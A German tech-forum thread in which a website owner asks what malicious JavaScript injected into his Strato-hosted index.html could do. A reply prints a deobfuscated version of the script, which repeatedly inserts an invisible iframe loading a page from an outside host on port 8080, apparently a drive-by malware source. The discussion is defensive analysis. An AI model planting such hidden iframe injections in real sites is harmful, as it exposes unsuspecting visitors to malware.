ComputerBase Menü
Aktuelles

Javascript Schadcode auf Strato Webseite!

M

maddoccc

Lieutenant
Registriert
März 2009
Beiträge
562
Hi Leute,

seit einigen Tagen ist meine Webseite die auf einem Strato Server liegt abgeschalteten weil irgendjemand einen Schadcode in der index.html implementiert hat.

Den Schadcode habe ich nun entfernt und alle Passwörter geändert. Sollte also nicht wieder kommen.

Nun frage ich mich was dieser Javascript Schadcode auf den Computer anrichten kann weil ein paar Bekannte diesen unbewusst mit der Seite geöffnet hatten.

Den Code habe ich mal für die Profis unter euch in den Anhang getan. Sollte dies gegen einen Grundsatz des Boards verstoßen bitte ich den Anhang zu löschen. Dann versuche ich das Script in abgeänderter Form hier zu posten.

Gruß Maddoc
 

Anhänge

  • script.rar
    1 KB · Aufrufe: 159
nach etwas Suchen & Ersetzen und unnützen Code entfernen bleib nur mehr folgendes über:

PHP: 
try {

	var vowel;

	function reach(){

	    clearInterval(vowel);

	    div = document["createElement"]("div");
	    div.id = 'div_1';
	    div.name = 'div_1';
	    document["body"]["appendChild"](div);

	    createElement = document["createElement"]("iframe");

		createElement.setAttribute("src","http://temp.rockwellentertainment.net:8080/index.php?pid=1");
		createElement.setAttribute("height",-1);
		createElement.setAttribute("width",-1);
		createElement.setAttribute("frameborder",0);

	    document.getElementById('div_1')["appendChild"](createElement);
	}

	vowel = window.setInterval(reach, '323');

}
catch(no) {
	alert(no)
}

Sieht so aus wurde versuch ein iframe einzubetten um den Inhalt einer anderen Seite zu laden ;)

Grüße
 
Komisch. Warum schlägt dann der Virenscanner an und bei einem Freund kam sogar ein Bluescreen?
 
Vermutlich liefert diese Seite irgendeinen Schadcode aus. Konnte hier unter MacOSX und Safari aber nicht besonderes feststellen - außer einen kryptischen HTTP-Header Eintrag der eventuell beim älteren IE Versionen Probleme verursacht.
 

Anhänge

  • header.jpg
    header.jpg
    126,5 KB · Aufrufe: 166
Du musst dich einloggen oder registrieren, um hier zu antworten.

Ähnliche Themen

Grrdi
in Kurzbefehle-App Safari Webseite so öffnen und vorbereiten, dass das Standart Javascript funktioniert.
Antworten
4
Aufrufe
10.668
Grrdi
Grrdi
QuerSiehsteMehr
Leserartikel LG OLED48CX8LX - Die Eierlegende Wollmilchsau?
41 42 43
Antworten
848
Aufrufe
170.074
Blood011
Blood011
ibm9001
Erfahrungsbericht: GPU Passthrough mit AMD Ryzen 5700G auf einem ITX Mainboard BIOSTAR B550T-Silver
Antworten
14
Aufrufe
8.543
ibm9001
ibm9001
steammod
Leserartikel Windows Update - automatischer Neustart verhindern, auf manuell umstellen
Antworten
10
Aufrufe
5.929
Hollex
Hollex
Bigeagle
Leserartikel Lesertest einer Glorious Model D – im Vergleich zu einer Steelseries Sensei
Antworten
3
Aufrufe
3.825
chris12
chris12
Zurück
Oben

Willkommen auf ComputerBase!

Mit Werbung weiterlesen

Besuche ComputerBase wie gewohnt mit Werbung und Tracking. Die Zustimmung ist jederzeit widerrufbar.

Details im Privacy Center und in der Liste unserer Partner. Ein Widerruf ist möglich in der Datenschutzerklärung.

… oder ComputerBase Pro bestellen

Nutze ComputerBase ohne Werbebanner, Video-Ads und Werbetracking schon für 4 €/Monat oder 36 €/Jahr.

Mehr zu ComputerBase Pro

Bereits Pro-Nutzer? Hier anmelden.

Tracking: Wir und unsere 165 Partner verarbeiten personenbezogene Daten, indem wir mit auf Ihrem Gerät gespeicherten Informationen (z. B. eindeutige Kennungen in Cookies) ein Nutzungsprofil erstellen, um z. B. Anzeigen zu personalisieren. Verarbeitungszwecke: Genaue Standortdaten und Abfrage von Geräteeigenschaften zur Identifikation, Informationen auf einem Gerät speichern und/oder abrufen, Personalisierte Anzeigen und Inhalte, Anzeigen- und Inhaltsmessungen, Erkenntnisse über Zielgruppen und Produktentwicklungen.

Impressum Kontakt Datenschutz